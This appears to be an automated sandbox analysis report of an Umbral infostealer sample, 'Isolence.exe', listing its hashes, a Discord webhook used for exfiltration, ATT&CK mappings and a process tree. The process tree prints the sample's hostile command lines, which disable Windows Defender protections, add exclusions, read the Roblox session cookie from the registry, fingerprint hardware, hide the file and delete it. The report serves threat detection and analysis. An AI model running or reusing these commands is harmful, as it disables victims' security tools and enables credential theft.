Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-09-2024 04:00
Static task
static1
Behavioral task
behavioral1
Sample
Isolence.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Isolence.exe
Resource
win10v2004-20240802-en
General
-
Target
Isolence.exe
-
Size
402KB
-
MD5
87e7cabc378978827ad35f11a7e3d311
-
SHA1
eebf169bc83f6809229a8e2bd7925f99c216842f
-
SHA256
441d5ad14a8d62643e2fe09046f6afe5b04b045c89dc3b213fcb695d5faa0063
-
SHA512
2893da6232254d14d8038529e636f8178ef0b2143f640e6655de9186635b545d19713c843409840f8a1807adfe9ef10c344a42d448c9d71663f988d29467f039
-
SSDEEP
6144:Vqg1BFe479zdJQxMh1PLm1Puu24ZmlLKSCbOymoeFKJCTownhl4K/X:Vx247OGQ3Z+WS2eVPnv4Kv
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1286981641851637780/-WMXJrqKM5C5eZN9F0Yht_JO0QIp0YbC8pbc8n9RzuyWAepl7ztN7Q5-nwguGbhQlPQA
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000c00000001226b-4.dat family_umbral behavioral1/memory/1728-8-0x0000000000F20000-0x0000000000F60000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2640 powershell.exe 3068 powershell.exe 1004 powershell.exe 2528 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts insolence.exe -
Executes dropped EXE 1 IoCs
pid Process 1728 insolence.exe -
Loads dropped DLL 1 IoCs
pid Process 2032 Isolence.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Isolence.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1136 cmd.exe 1644 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 752 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1644 PING.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2676 powershell.exe 1728 insolence.exe 2640 powershell.exe 3068 powershell.exe 1004 powershell.exe 1508 powershell.exe 2528 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2676 powershell.exe Token: SeDebugPrivilege 1728 insolence.exe Token: SeIncreaseQuotaPrivilege 1984 wmic.exe Token: SeSecurityPrivilege 1984 wmic.exe Token: SeTakeOwnershipPrivilege 1984 wmic.exe Token: SeLoadDriverPrivilege 1984 wmic.exe Token: SeSystemProfilePrivilege 1984 wmic.exe Token: SeSystemtimePrivilege 1984 wmic.exe Token: SeProfSingleProcessPrivilege 1984 wmic.exe Token: SeIncBasePriorityPrivilege 1984 wmic.exe Token: SeCreatePagefilePrivilege 1984 wmic.exe Token: SeBackupPrivilege 1984 wmic.exe Token: SeRestorePrivilege 1984 wmic.exe Token: SeShutdownPrivilege 1984 wmic.exe Token: SeDebugPrivilege 1984 wmic.exe Token: SeSystemEnvironmentPrivilege 1984 wmic.exe Token: SeRemoteShutdownPrivilege 1984 wmic.exe Token: SeUndockPrivilege 1984 wmic.exe Token: SeManageVolumePrivilege 1984 wmic.exe Token: 33 1984 wmic.exe Token: 34 1984 wmic.exe Token: 35 1984 wmic.exe Token: SeIncreaseQuotaPrivilege 1984 wmic.exe Token: SeSecurityPrivilege 1984 wmic.exe Token: SeTakeOwnershipPrivilege 1984 wmic.exe Token: SeLoadDriverPrivilege 1984 wmic.exe Token: SeSystemProfilePrivilege 1984 wmic.exe Token: SeSystemtimePrivilege 1984 wmic.exe Token: SeProfSingleProcessPrivilege 1984 wmic.exe Token: SeIncBasePriorityPrivilege 1984 wmic.exe Token: SeCreatePagefilePrivilege 1984 wmic.exe Token: SeBackupPrivilege 1984 wmic.exe Token: SeRestorePrivilege 1984 wmic.exe Token: SeShutdownPrivilege 1984 wmic.exe Token: SeDebugPrivilege 1984 wmic.exe Token: SeSystemEnvironmentPrivilege 1984 wmic.exe Token: SeRemoteShutdownPrivilege 1984 wmic.exe Token: SeUndockPrivilege 1984 wmic.exe Token: SeManageVolumePrivilege 1984 wmic.exe Token: 33 1984 wmic.exe Token: 34 1984 wmic.exe Token: 35 1984 wmic.exe Token: SeDebugPrivilege 2640 powershell.exe Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 1004 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeIncreaseQuotaPrivilege 1916 wmic.exe Token: SeSecurityPrivilege 1916 wmic.exe Token: SeTakeOwnershipPrivilege 1916 wmic.exe Token: SeLoadDriverPrivilege 1916 wmic.exe Token: SeSystemProfilePrivilege 1916 wmic.exe Token: SeSystemtimePrivilege 1916 wmic.exe Token: SeProfSingleProcessPrivilege 1916 wmic.exe Token: SeIncBasePriorityPrivilege 1916 wmic.exe Token: SeCreatePagefilePrivilege 1916 wmic.exe Token: SeBackupPrivilege 1916 wmic.exe Token: SeRestorePrivilege 1916 wmic.exe Token: SeShutdownPrivilege 1916 wmic.exe Token: SeDebugPrivilege 1916 wmic.exe Token: SeSystemEnvironmentPrivilege 1916 wmic.exe Token: SeRemoteShutdownPrivilege 1916 wmic.exe Token: SeUndockPrivilege 1916 wmic.exe Token: SeManageVolumePrivilege 1916 wmic.exe Token: 33 1916 wmic.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 2032 wrote to memory of 2676 2032 Isolence.exe 30 PID 2032 wrote to memory of 2676 2032 Isolence.exe 30 PID 2032 wrote to memory of 2676 2032 Isolence.exe 30 PID 2032 wrote to memory of 2676 2032 Isolence.exe 30 PID 2032 wrote to memory of 1728 2032 Isolence.exe 32 PID 2032 wrote to memory of 1728 2032 Isolence.exe 32 PID 2032 wrote to memory of 1728 2032 Isolence.exe 32 PID 2032 wrote to memory of 1728 2032 Isolence.exe 32 PID 1728 wrote to memory of 1984 1728 insolence.exe 33 PID 1728 wrote to memory of 1984 1728 insolence.exe 33 PID 1728 wrote to memory of 1984 1728 insolence.exe 33 PID 1728 wrote to memory of 2756 1728 insolence.exe 36 PID 1728 wrote to memory of 2756 1728 insolence.exe 36 PID 1728 wrote to memory of 2756 1728 insolence.exe 36 PID 1728 wrote to memory of 2640 1728 insolence.exe 38 PID 1728 wrote to memory of 2640 1728 insolence.exe 38 PID 1728 wrote to memory of 2640 1728 insolence.exe 38 PID 1728 wrote to memory of 3068 1728 insolence.exe 40 PID 1728 wrote to memory of 3068 1728 insolence.exe 40 PID 1728 wrote to memory of 3068 1728 insolence.exe 40 PID 1728 wrote to memory of 1004 1728 insolence.exe 42 PID 1728 wrote to memory of 1004 1728 insolence.exe 42 PID 1728 wrote to memory of 1004 1728 insolence.exe 42 PID 1728 wrote to memory of 1508 1728 insolence.exe 44 PID 1728 wrote to memory of 1508 1728 insolence.exe 44 PID 1728 wrote to memory of 1508 1728 insolence.exe 44 PID 1728 wrote to memory of 1916 1728 insolence.exe 46 PID 1728 wrote to memory of 1916 1728 insolence.exe 46 PID 1728 wrote to memory of 1916 1728 insolence.exe 46 PID 1728 wrote to memory of 1204 1728 insolence.exe 48 PID 1728 wrote to memory of 1204 1728 insolence.exe 48 PID 1728 wrote to memory of 1204 1728 insolence.exe 48 PID 1728 wrote to memory of 2224 1728 insolence.exe 50 PID 1728 wrote to memory of 2224 1728 insolence.exe 50 PID 1728 wrote to memory of 2224 1728 insolence.exe 50 PID 1728 wrote to memory of 2528 1728 insolence.exe 52 PID 1728 wrote to memory of 2528 1728 insolence.exe 52 PID 1728 wrote to memory of 2528 1728 insolence.exe 52 PID 1728 wrote to memory of 752 1728 insolence.exe 54 PID 1728 wrote to memory of 752 1728 insolence.exe 54 PID 1728 wrote to memory of 752 1728 insolence.exe 54 PID 1728 wrote to memory of 1136 1728 insolence.exe 56 PID 1728 wrote to memory of 1136 1728 insolence.exe 56 PID 1728 wrote to memory of 1136 1728 insolence.exe 56 PID 1136 wrote to memory of 1644 1136 cmd.exe 58 PID 1136 wrote to memory of 1644 1136 cmd.exe 58 PID 1136 wrote to memory of 1644 1136 cmd.exe 58 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2756 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Isolence.exe"C:\Users\Admin\AppData\Local\Temp\Isolence.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZAB1ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAdABxACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgBlAHMAdABhAHIAdAAgAHAAYwAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAZABpAGIAIwA+AA=="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\Users\Admin\AppData\Local\Temp\insolence.exe"C:\Users\Admin\AppData\Local\Temp\insolence.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\insolence.exe"3⤵
- Views/modifies file attributes
PID:2756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\insolence.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:1204
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2528
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:752
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\insolence.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1644
-
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
229KB
MD57553d23f56459f7a00e0c4d0bafaf675
SHA1625bed675494bcba3860b57680bef8e09ba7429d
SHA256d385a83b02ae2e7a2357a17abaa909406a88ad720faee797ad3fb11bdcc31200
SHA512a577a2c02960b8fdb4614cf41cbde3da6e22f548e2a100885f58d763cb5c38893a21d07ebdc2046890e0cb9fcede09f7dd935d713e35ae184d679766c9ac3b41
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZP0KY6IJ1TIDQLFM2YHF.temp
Filesize7KB
MD5449fc86ed3497ea972533abd0977792c
SHA1e23053f67f2c3eb177cb88e7874ec1f5fc6a1586
SHA25612cd3f491dadfa068d18b0af842158b50172d709b0d09deac25e61138a85b9c6
SHA51221ce60723a76a0597933be6ffbfd9329a8d1e5070555b3ef112b20bd996551340ca85c0397f45515d7e361da02b3e2e24455398a5978fd17b54a77ee462309b5